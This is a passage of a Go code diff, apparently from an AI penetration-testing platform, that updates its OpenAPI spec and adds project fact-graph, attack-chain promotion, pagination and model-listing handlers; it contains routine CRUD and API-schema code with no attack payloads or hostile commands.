func NewOpenAPIHandler(db *database.DB, logger *zap.Logger, resultStorage storage.ResultStorage, conversationHdlr *ConversationHandler, agentHdlr *AgentHandler) *OpenAPIHandler {
|
func NewOpenAPIHandler(db *database.DB, logger *zap.Logger, conversationHdlr *ConversationHandler, agentHdlr *AgentHandler) *OpenAPIHandler {
|
||||||
return &OpenAPIHandler{
|
return &OpenAPIHandler{
|
||||||
db: db,
|
db: db,
|
||||||
logger: logger,
|
logger: logger,
|
||||||
resultStorage: resultStorage,
|
|
||||||
conversationHdlr: conversationHdlr,
|
conversationHdlr: conversationHdlr,
|
||||||
agentHdlr: agentHdlr,
|
agentHdlr: agentHdlr,
|
||||||
}
|
}
|
||||||
@@ -237,7 +233,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
|
|||||||
"status": map[string]interface{}{
|
"status": map[string]interface{}{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"description": "状态",
|
"description": "状态",
|
||||||
"enum": []string{"open", "closed", "fixed"},
|
"enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"},
|
||||||
},
|
},
|
||||||
"target": map[string]interface{}{
|
"target": map[string]interface{}{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
@@ -575,7 +571,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
|
|||||||
"status": map[string]interface{}{
|
"status": map[string]interface{}{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"description": "状态",
|
"description": "状态",
|
||||||
"enum": []string{"open", "closed", "fixed"},
|
"enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"},
|
||||||
},
|
},
|
||||||
"type": map[string]interface{}{
|
"type": map[string]interface{}{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
@@ -809,8 +805,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
|
|||||||
"jpeg_quality": map[string]interface{}{"type": "integer", "description": "JPEG 质量 60-100"},
|
"jpeg_quality": map[string]interface{}{"type": "integer", "description": "JPEG 质量 60-100"},
|
||||||
"max_payload_bytes": map[string]interface{}{"type": "integer", "description": "送 API 体积上限(字节)"},
|
"max_payload_bytes": map[string]interface{}{"type": "integer", "description": "送 API 体积上限(字节)"},
|
||||||
"skip_preprocess_below_bytes": map[string]interface{}{"type": "integer", "description": "低于该字节且尺寸合规时可原图直传;0=始终压缩"},
|
"skip_preprocess_below_bytes": map[string]interface{}{"type": "integer", "description": "低于该字节且尺寸合规时可原图直传;0=始终压缩"},
|
||||||
"detail": map[string]interface{}{"type": "string", "enum": []string{"low", "high", "auto"}, "description": "OpenAI 兼容 image detail"},
|
"detail": map[string]interface{}{"type": "string", "enum": []string{"low", "high", "auto"}, "description": "OpenAI 兼容 image detail"},
|
||||||
"allowed_roots": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "额外允许读取的绝对路径根"},
|
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
"AnalyzeImageToolCall": map[string]interface{}{
|
"AnalyzeImageToolCall": map[string]interface{}{
|
||||||
@@ -819,7 +814,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
|
|||||||
"properties": map[string]interface{}{
|
"properties": map[string]interface{}{
|
||||||
"path": map[string]interface{}{
|
"path": map[string]interface{}{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"description": "图片路径(cwd、chat_uploads、result_storage_dir 或 allowed_roots 下)",
|
"description": "图片绝对路径或相对于进程工作目录的路径",
|
||||||
},
|
},
|
||||||
"question": map[string]interface{}{
|
"question": map[string]interface{}{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
@@ -1345,7 +1340,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
|
|||||||
"delete": map[string]interface{}{
|
"delete": map[string]interface{}{
|
||||||
"tags": []string{"对话管理"},
|
"tags": []string{"对话管理"},
|
||||||
"summary": "删除对话",
|
"summary": "删除对话",
|
||||||
"description": "删除指定的对话及其所有相关数据(消息、漏洞等)。**此操作不可恢复**。",
|
"description": "删除指定的对话及其会话数据(消息、攻击链等)。**漏洞记录会保留**,仅解除与会话的关联。**此操作不可恢复**。",
|
||||||
"operationId": "deleteConversation",
|
"operationId": "deleteConversation",
|
||||||
"parameters": []map[string]interface{}{
|
"parameters": []map[string]interface{}{
|
||||||
{
|
{
|
||||||
@@ -2469,17 +2464,108 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
|
|||||||
"parameters": []map[string]interface{}{
|
"parameters": []map[string]interface{}{
|
||||||
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
||||||
{"name": "fact_key", "in": "query", "schema": map[string]interface{}{"type": "string"}},
|
{"name": "fact_key", "in": "query", "schema": map[string]interface{}{"type": "string"}},
|
||||||
|
{"name": "include_links", "in": "query", "schema": map[string]interface{}{"type": "boolean"}},
|
||||||
|
{"name": "include_link_counts", "in": "query", "schema": map[string]interface{}{"type": "boolean"}},
|
||||||
},
|
},
|
||||||
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "事实列表或单条"}},
|
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "事实列表或单条(可含 link_counts / outgoing_links)"}},
|
||||||
},
|
},
|
||||||
"post": map[string]interface{}{
|
"post": map[string]interface{}{
|
||||||
"tags": []string{"项目管理"}, "summary": "创建/更新事实", "operationId": "upsertProjectFactREST",
|
"tags": []string{"项目管理"}, "summary": "创建/更新事实", "operationId": "upsertProjectFactREST",
|
||||||
"parameters": []map[string]interface{}{
|
"parameters": []map[string]interface{}{
|
||||||
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
||||||
},
|
},
|
||||||
|
"requestBody": map[string]interface{}{
|
||||||
|
"required": true,
|
||||||
|
"content": map[string]interface{}{
|
||||||
|
"application/json": map[string]interface{}{
|
||||||
|
"schema": map[string]interface{}{
|
||||||
|
"type": "object",
|
||||||
|
"properties": map[string]interface{}{
|
||||||
|
"fact_key": map[string]interface{}{"type": "string"},
|
||||||
|
"summary": map[string]interface{}{"type": "string"},
|
||||||
|
"links": map[string]interface{}{
|
||||||
|
"type": "array",
|
||||||
|
"items": map[string]interface{}{
|
||||||
|
"type": "object",
|
||||||
|
"properties": map[string]interface{}{
|
||||||
|
"to": map[string]interface{}{"type": "string"},
|
||||||
|
"type": map[string]interface{}{"type": "string"},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"links_text": map[string]interface{}{"type": "string", "description": "type: fact_key 每行一条"},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "成功"}},
|
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "成功"}},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
"/api/projects/{id}/fact-graph": map[string]interface{}{
|
||||||
|
"get": map[string]interface{}{
|
||||||
|
"tags": []string{"项目管理"}, "summary": "获取项目事实攻击路径图", "operationId": "getProjectFactGraph",
|
||||||
|
"parameters": []map[string]interface{}{
|
||||||
|
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
||||||
|
{"name": "view", "in": "query", "schema": map[string]interface{}{"type": "string", "enum": []string{"path", "full"}, "default": "path"}},
|
||||||
|
{"name": "exclude_deprecated", "in": "query", "schema": map[string]interface{}{"type": "boolean", "default": true}},
|
||||||
|
},
|
||||||
|
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "nodes + edges"}},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"/api/projects/{id}/fact-edges": map[string]interface{}{
|
||||||
|
"get": map[string]interface{}{
|
||||||
|
"tags": []string{"项目管理"}, "summary": "列出项目全部事实边", "operationId": "listProjectFactEdges",
|
||||||
|
"parameters": []map[string]interface{}{
|
||||||
|
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
||||||
|
},
|
||||||
|
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "边列表"}},
|
||||||
|
},
|
||||||
|
"post": map[string]interface{}{
|
||||||
|
"tags": []string{"项目管理"}, "summary": "添加事实边", "operationId": "createProjectFactEdge",
|
||||||
|
"parameters": []map[string]interface{}{
|
||||||
|
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
||||||
|
},
|
||||||
|
"requestBody": map[string]interface{}{
|
||||||
|
"required": true,
|
||||||
|
"content": map[string]interface{}{
|
||||||
|
"application/json": map[string]interface{}{
|
||||||
|
"schema": map[string]interface{}{
|
||||||
|
"type": "object",
|
||||||
|
"required": []string{"source_fact_key", "target_fact_key", "edge_type"},
|
||||||
|
"properties": map[string]interface{}{
|
||||||
|
"source_fact_key": map[string]interface{}{"type": "string"},
|
||||||
|
"target_fact_key": map[string]interface{}{"type": "string"},
|
||||||
|
"edge_type": map[string]interface{}{"type": "string"},
|
||||||
|
"confidence": map[string]interface{}{"type": "string"},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "边已创建"}},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"/api/projects/{id}/fact-edges/{edgeId}": map[string]interface{}{
|
||||||
|
"delete": map[string]interface{}{
|
||||||
|
"tags": []string{"项目管理"}, "summary": "删除事实边", "operationId": "deleteProjectFactEdge",
|
||||||
|
"parameters": []map[string]interface{}{
|
||||||
|
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
||||||
|
{"name": "edgeId", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
||||||
|
},
|
||||||
|
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "删除成功"}},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"/api/projects/{id}/promote-attack-chain/{conversationId}": map[string]interface{}{
|
||||||
|
"post": map[string]interface{}{
|
||||||
|
"tags": []string{"项目管理"}, "summary": "将对话攻击链沉淀到项目事实图", "operationId": "promoteAttackChainToProject",
|
||||||
|
"parameters": []map[string]interface{}{
|
||||||
|
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
||||||
|
{"name": "conversationId", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
|
||||||
|
},
|
||||||
|
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "沉淀结果(facts/edges/graph)"}},
|
||||||
|
},
|
||||||
|
},
|
||||||
"/api/vulnerabilities": map[string]interface{}{
|
"/api/vulnerabilities": map[string]interface{}{
|
||||||
"get": map[string]interface{}{
|
"get": map[string]interface{}{
|
||||||
"tags": []string{"漏洞管理"},
|
"tags": []string{"漏洞管理"},
|
||||||
@@ -5035,6 +5121,51 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
|
|||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
"/api/config/list-models": map[string]interface{}{
|
||||||
|
"post": map[string]interface{}{
|
||||||
|
"tags": []string{"配置管理"},
|
||||||
|
"summary": "获取模型列表",
|
||||||
|
"description": "代理调用 OpenAI 兼容 GET /models,返回可用模型 id 列表。Claude 不支持。",
|
||||||
|
"operationId": "listModels",
|
||||||
|
"requestBody": map[string]interface{}{
|
||||||
|
"required": true,
|
||||||
|
"content": map[string]interface{}{
|
||||||
|
"application/json": map[string]interface{}{
|
||||||
|
"schema": map[string]interface{}{
|
||||||
|
"type": "object",
|
||||||
|
"required": []string{"api_key"},
|
||||||
|
"properties": map[string]interface{}{
|
||||||
|
"provider": map[string]interface{}{"type": "string", "description": "LLM提供商(openai/claude)", "example": "openai"},
|
||||||
|
"base_url": map[string]interface{}{"type": "string", "description": "API基地址(可选)"},
|
||||||
|
"api_key": map[string]interface{}{"type": "string", "description": "API密钥"},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"responses": map[string]interface{}{
|
||||||
|
"200": map[string]interface{}{
|
||||||
|
"description": "获取结果",
|
||||||
|
"content": map[string]interface{}{
|
||||||
|
"application/json": map[string]interface{}{
|
||||||
|
"schema": map[string]interface{}{
|
||||||
|
"type": "object",
|
||||||
|
"properties": map[string]interface{}{
|
||||||
|
"success": map[string]interface{}{"type": "boolean"},
|
||||||
|
"supported": map[string]interface{}{"type": "boolean"},
|
||||||
|
"error": map[string]interface{}{"type": "string"},
|
||||||
|
"models": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}},
|
||||||
|
"count": map[string]interface{}{"type": "integer"},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"400": map[string]interface{}{"description": "参数错误"},
|
||||||
|
"401": map[string]interface{}{"description": "未授权"},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
|
||||||
// ==================== 终端 ====================
|
// ==================== 终端 ====================
|
||||||
"/api/terminal/run": map[string]interface{}{
|
"/api/terminal/run": map[string]interface{}{
|
||||||
@@ -6355,35 +6486,8 @@ func (h *OpenAPIHandler) GetConversationResults(c *gin.Context) {
|
|||||||
vulnerabilities[i] = *v
|
vulnerabilities[i] = *v
|
||||||
}
|
}
|
||||||
|
|
||||||
// 获取执行结果(从MCP执行记录中获取)
|
// 获取执行结果(历史大结果由 Eino reduction 落盘,此处不再聚合文件存储)
|
||||||
executionResults := []map[string]interface{}{}
|
executionResults := []map[string]interface{}{}
|
||||||
for _, msg := range messages {
|
|
||||||
if len(msg.MCPExecutionIDs) > 0 {
|
|
||||||
for _, execID := range msg.MCPExecutionIDs {
|
|
||||||
// 尝试从结果存储中获取执行结果
|
|
||||||
if h.resultStorage != nil {
|
|
||||||
result, err := h.resultStorage.GetResult(execID)
|
|
||||||
if err == nil && result != "" {
|
|
||||||
// 获取元数据以获取工具名称和创建时间
|
|
||||||
metadata, err := h.resultStorage.GetResultMetadata(execID)
|
|
||||||
toolName := "unknown"
|
|
||||||
createdAt := time.Now()
|
|
||||||
if err == nil && metadata != nil {
|
|
||||||
toolName = metadata.ToolName
|
|
||||||
createdAt = metadata.CreatedAt
|
|
||||||
}
|
|
||||||
executionResults = append(executionResults, map[string]interface{}{
|
|
||||||
"id": execID,
|
|
||||||
"toolName": toolName,
|
|
||||||
"status": "success",
|
|
||||||
"result": result,
|
|
||||||
"createdAt": createdAt.Format(time.RFC3339),
|
|
||||||
})
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
response := map[string]interface{}{
|
response := map[string]interface{}{
|
||||||
"conversationId": conv.ID,
|
"conversationId": conv.ID,
|
||||||
|
|||||||
+301
-57
@@ -1,10 +1,12 @@
|
|||||||
package handler
|
package handler
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"fmt"
|
||||||
"net/http"
|
"net/http"
|
||||||
"strconv"
|
"strconv"
|
||||||
"strings"
|
"strings"
|
||||||
|
|
||||||
|
"cyberstrike-ai/internal/attackchain"
|
||||||
"cyberstrike-ai/internal/database"
|
"cyberstrike-ai/internal/database"
|
||||||
"cyberstrike-ai/internal/project"
|
"cyberstrike-ai/internal/project"
|
||||||
|
|
||||||
@@ -12,6 +14,16 @@ import (
|
|||||||
"go.uber.org/zap"
|
"go.uber.org/zap"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
const maxProjectDescriptionRunes = 4000
|
||||||
|
|
||||||
|
func clampProjectDescription(s string) string {
|
||||||
|
r := []rune(s)
|
||||||
|
if len(r) <= maxProjectDescriptionRunes {
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
return string(r[:maxProjectDescriptionRunes])
|
||||||
|
}
|
||||||
|
|
||||||
// ProjectHandler 项目管理处理器。
|
// ProjectHandler 项目管理处理器。
|
||||||
type ProjectHandler struct {
|
type ProjectHandler struct {
|
||||||
db *database.DB
|
db *database.DB
|
||||||
@@ -48,7 +60,7 @@ func (h *ProjectHandler) CreateProject(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
p := &database.Project{
|
p := &database.Project{
|
||||||
Name: strings.TrimSpace(req.Name),
|
Name: strings.TrimSpace(req.Name),
|
||||||
Description: req.Description,
|
Description: clampProjectDescription(req.Description),
|
||||||
ScopeJSON: req.ScopeJSON,
|
ScopeJSON: req.ScopeJSON,
|
||||||
Status: strings.TrimSpace(req.Status),
|
Status: strings.TrimSpace(req.Status),
|
||||||
}
|
}
|
||||||
@@ -61,12 +73,40 @@ func (h *ProjectHandler) CreateProject(c *gin.Context) {
|
|||||||
c.JSON(http.StatusOK, created)
|
c.JSON(http.StatusOK, created)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// GetDashboardSummary GET /api/projects/dashboard-summary
|
||||||
|
func (h *ProjectHandler) GetDashboardSummary(c *gin.Context) {
|
||||||
|
limit, _ := strconv.Atoi(strings.TrimSpace(c.DefaultQuery("fact_limit", "5")))
|
||||||
|
if limit <= 0 {
|
||||||
|
limit = 5
|
||||||
|
}
|
||||||
|
if limit > 50 {
|
||||||
|
limit = 50
|
||||||
|
}
|
||||||
|
summary, err := h.db.GetProjectDashboardSummary(limit)
|
||||||
|
if err != nil {
|
||||||
|
h.logger.Error("获取项目仪表盘摘要失败", zap.Error(err))
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if summary.RecentFacts == nil {
|
||||||
|
summary.RecentFacts = []database.ProjectDashboardFact{}
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, summary)
|
||||||
|
}
|
||||||
|
|
||||||
// ListProjects GET /api/projects
|
// ListProjects GET /api/projects
|
||||||
func (h *ProjectHandler) ListProjects(c *gin.Context) {
|
func (h *ProjectHandler) ListProjects(c *gin.Context) {
|
||||||
status := c.Query("status")
|
status := c.Query("status")
|
||||||
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "200"))
|
search := c.Query("search")
|
||||||
|
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "50"))
|
||||||
offset, _ := strconv.Atoi(c.Query("offset"))
|
offset, _ := strconv.Atoi(c.Query("offset"))
|
||||||
list, err := h.db.ListProjects(status, limit, offset)
|
if limit <= 0 {
|
||||||
|
limit = 50
|
||||||
|
}
|
||||||
|
if limit > 500 {
|
||||||
|
limit = 500
|
||||||
|
}
|
||||||
|
list, err := h.db.ListProjects(status, search, limit, offset)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
return
|
return
|
||||||
@@ -74,7 +114,17 @@ func (h *ProjectHandler) ListProjects(c *gin.Context) {
|
|||||||
if list == nil {
|
if list == nil {
|
||||||
list = []*database.Project{}
|
list = []*database.Project{}
|
||||||
}
|
}
|
||||||
c.JSON(http.StatusOK, list)
|
total, err := h.db.CountProjects(status, search)
|
||||||
|
if err != nil {
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, gin.H{
|
||||||
|
"projects": list,
|
||||||
|
"total": total,
|
||||||
|
"limit": limit,
|
||||||
|
"offset": offset,
|
||||||
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
// GetProjectStats GET /api/projects/:id/stats
|
// GetProjectStats GET /api/projects/:id/stats
|
||||||
@@ -146,7 +196,7 @@ func (h *ProjectHandler) UpdateProject(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
if req.Description != nil {
|
if req.Description != nil {
|
||||||
p.Description = *req.Description
|
p.Description = clampProjectDescription(*req.Description)
|
||||||
}
|
}
|
||||||
if req.ScopeJSON != nil {
|
if req.ScopeJSON != nil {
|
||||||
p.ScopeJSON = *req.ScopeJSON
|
p.ScopeJSON = *req.ScopeJSON
|
||||||
@@ -175,26 +225,102 @@ func (h *ProjectHandler) DeleteProject(c *gin.Context) {
|
|||||||
c.JSON(http.StatusOK, gin.H{"success": true})
|
c.JSON(http.StatusOK, gin.H{"success": true})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
type factLinkRequest struct {
|
||||||
|
From string `json:"from"`
|
||||||
|
Type string `json:"type"`
|
||||||
|
Confidence string `json:"confidence,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
type upsertFactRequest struct {
|
type upsertFactRequest struct {
|
||||||
FactKey string `json:"fact_key" binding:"required"`
|
FactKey string `json:"fact_key" binding:"required"`
|
||||||
Category string `json:"category"`
|
Category string `json:"category"`
|
||||||
Summary string `json:"summary" binding:"required"`
|
Summary string `json:"summary" binding:"required"`
|
||||||
Body string `json:"body"`
|
Body string `json:"body"`
|
||||||
Confidence string `json:"confidence"`
|
Confidence string `json:"confidence"`
|
||||||
Pinned bool `json:"pinned"`
|
Pinned bool `json:"pinned"`
|
||||||
RelatedVulnerabilityID string `json:"related_vulnerability_id"`
|
RelatedVulnerabilityID string `json:"related_vulnerability_id"`
|
||||||
|
Links []factLinkRequest `json:"links"`
|
||||||
|
LinksText *string `json:"links_text"`
|
||||||
}
|
}
|
||||||
|
|
||||||
// updateFactRequest 部分更新事实;指针字段省略=不修改,body 传 "" 可清空(仍走 merge 逻辑见 Upsert)。
|
// updateFactRequest 部分更新事实;指针字段省略=不修改,body 传 "" 可清空(仍走 merge 逻辑见 Upsert)。
|
||||||
type updateFactRequest struct {
|
type updateFactRequest struct {
|
||||||
FactKey *string `json:"fact_key"`
|
FactKey *string `json:"fact_key"`
|
||||||
Category *string `json:"category"`
|
Category *string `json:"category"`
|
||||||
Summary *string `json:"summary"`
|
Summary *string `json:"summary"`
|
||||||
Body *string `json:"body"`
|
Body *string `json:"body"`
|
||||||
Confidence *string `json:"confidence"`
|
Confidence *string `json:"confidence"`
|
||||||
Pinned *bool `json:"pinned"`
|
Pinned *bool `json:"pinned"`
|
||||||
RelatedVulnerabilityID *string `json:"related_vulnerability_id"`
|
RelatedVulnerabilityID *string `json:"related_vulnerability_id"`
|
||||||
ClearBody bool `json:"clear_body"`
|
ClearBody bool `json:"clear_body"`
|
||||||
|
Links *[]factLinkRequest `json:"links"`
|
||||||
|
LinksText *string `json:"links_text"`
|
||||||
|
}
|
||||||
|
|
||||||
|
func factLinksFromRequest(links []factLinkRequest, linksText *string) (*project.ParsedFactLinks, error) {
|
||||||
|
if len(links) > 0 {
|
||||||
|
parsed := &project.ParsedFactLinks{}
|
||||||
|
for i, l := range links {
|
||||||
|
from := strings.TrimSpace(l.From)
|
||||||
|
edgeType := strings.TrimSpace(l.Type)
|
||||||
|
if from == "" {
|
||||||
|
return nil, fmt.Errorf("links[%d] 须含 from", i)
|
||||||
|
}
|
||||||
|
if edgeType == "" {
|
||||||
|
return nil, fmt.Errorf("links[%d] 须含 type", i)
|
||||||
|
}
|
||||||
|
parsed.Incoming = append(parsed.Incoming, database.ProjectFactEdgeFromInput{
|
||||||
|
From: from, Type: edgeType, Confidence: strings.TrimSpace(l.Confidence),
|
||||||
|
})
|
||||||
|
}
|
||||||
|
return parsed, nil
|
||||||
|
}
|
||||||
|
if linksText != nil {
|
||||||
|
in, err := project.ParseFactLinksText(*linksText)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
return &project.ParsedFactLinks{Incoming: in}, nil
|
||||||
|
}
|
||||||
|
return &project.ParsedFactLinks{Incoming: []database.ProjectFactEdgeFromInput{}}, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
type factWithLinksResponse struct {
|
||||||
|
*database.ProjectFact
|
||||||
|
OutgoingLinks []*database.ProjectFactEdge `json:"outgoing_links,omitempty"`
|
||||||
|
IncomingLinks []*database.ProjectFactEdge `json:"incoming_links,omitempty"`
|
||||||
|
LinkCounts *project.LinkCounts `json:"link_counts,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
|
func (h *ProjectHandler) applyFactLinksAfterUpsert(projectID string, fact *database.ProjectFact, links []factLinkRequest, linksText *string, explicitLinks, parseBody bool) error {
|
||||||
|
if explicitLinks {
|
||||||
|
parsed, err := factLinksFromRequest(links, linksText)
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
return project.PersistFactLinksFromParsed(h.db, projectID, fact.FactKey, fact.SourceConversationID, parsed, true)
|
||||||
|
}
|
||||||
|
if parseBody {
|
||||||
|
inputs := project.ParseLinksFromBody(fact.Body)
|
||||||
|
if inputs == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
return project.PersistFactIncomingLinks(h.db, projectID, fact.FactKey, inputs, true)
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (h *ProjectHandler) factResponseWithLinks(projectID string, f *database.ProjectFact, includeLinks bool) interface{} {
|
||||||
|
if !includeLinks || f == nil {
|
||||||
|
return f
|
||||||
|
}
|
||||||
|
out, _ := h.db.ListOutgoingProjectFactEdges(projectID, f.FactKey)
|
||||||
|
in, _ := h.db.ListIncomingProjectFactEdges(projectID, f.FactKey)
|
||||||
|
return &factWithLinksResponse{
|
||||||
|
ProjectFact: f,
|
||||||
|
OutgoingLinks: out,
|
||||||
|
IncomingLinks: in,
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// ListFacts GET /api/projects/:id/facts (fact_key 查询参数可获取单条详情)
|
// ListFacts GET /api/projects/:id/facts (fact_key 查询参数可获取单条详情)
|
||||||
@@ -206,7 +332,8 @@ func (h *ProjectHandler) ListFacts(c *gin.Context) {
|
|||||||
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
|
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
c.JSON(http.StatusOK, f)
|
includeLinks := c.Query("include_links") == "1" || c.Query("include_links") == "true"
|
||||||
|
c.JSON(http.StatusOK, h.factResponseWithLinks(projectID, f, includeLinks))
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "100"))
|
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "100"))
|
||||||
@@ -237,45 +364,52 @@ func (h *ProjectHandler) ListFacts(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
list = filtered
|
list = filtered
|
||||||
}
|
}
|
||||||
c.JSON(http.StatusOK, list)
|
includeLinkCounts := c.Query("include_link_counts") == "1" || c.Query("include_link_counts") == "true"
|
||||||
}
|
if !includeLinkCounts {
|
||||||
|
c.JSON(http.StatusOK, list)
|
||||||
// GetFactPreviousVersion GET /api/projects/:id/facts/:factId/previous-version
|
|
||||||
func (h *ProjectHandler) GetFactPreviousVersion(c *gin.Context) {
|
|
||||||
existing, err := h.db.GetProjectFact(c.Param("factId"))
|
|
||||||
if err != nil || existing.ProjectID != c.Param("id") {
|
|
||||||
c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"})
|
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
if strings.TrimSpace(existing.SupersedesFactID) == "" {
|
counts, err := project.LoadProjectFactLinkCounts(h.db, projectID)
|
||||||
c.JSON(http.StatusNotFound, gin.H{"error": "无上一版本"})
|
|
||||||
return
|
|
||||||
}
|
|
||||||
v, err := h.db.GetProjectFactVersion(existing.SupersedesFactID)
|
|
||||||
if err != nil {
|
|
||||||
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
|
|
||||||
return
|
|
||||||
}
|
|
||||||
c.JSON(http.StatusOK, v)
|
|
||||||
}
|
|
||||||
|
|
||||||
// ListFactVersions GET /api/projects/:id/facts/:factId/versions
|
|
||||||
func (h *ProjectHandler) ListFactVersions(c *gin.Context) {
|
|
||||||
existing, err := h.db.GetProjectFact(c.Param("factId"))
|
|
||||||
if err != nil || existing.ProjectID != c.Param("id") {
|
|
||||||
c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"})
|
|
||||||
return
|
|
||||||
}
|
|
||||||
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "20"))
|
|
||||||
list, err := h.db.ListProjectFactVersions(existing.ID, limit)
|
|
||||||
if err != nil {
|
if err != nil {
|
||||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
if list == nil {
|
out := make([]factWithLinksResponse, 0, len(list))
|
||||||
list = []*database.ProjectFactVersion{}
|
for _, f := range list {
|
||||||
|
item := factWithLinksResponse{ProjectFact: f}
|
||||||
|
if c, ok := counts[f.FactKey]; ok {
|
||||||
|
cc := c
|
||||||
|
item.LinkCounts = &cc
|
||||||
|
}
|
||||||
|
out = append(out, item)
|
||||||
}
|
}
|
||||||
c.JSON(http.StatusOK, list)
|
c.JSON(http.StatusOK, out)
|
||||||
|
}
|
||||||
|
|
||||||
|
// GetFactGraph GET /api/projects/:id/fact-graph?view=path|full
|
||||||
|
func (h *ProjectHandler) GetFactGraph(c *gin.Context) {
|
||||||
|
projectID := c.Param("id")
|
||||||
|
if _, err := h.db.GetProject(projectID); err != nil {
|
||||||
|
c.JSON(http.StatusNotFound, gin.H{"error": "项目不存在"})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
view := c.DefaultQuery("view", "path")
|
||||||
|
excludeDeprecated := true
|
||||||
|
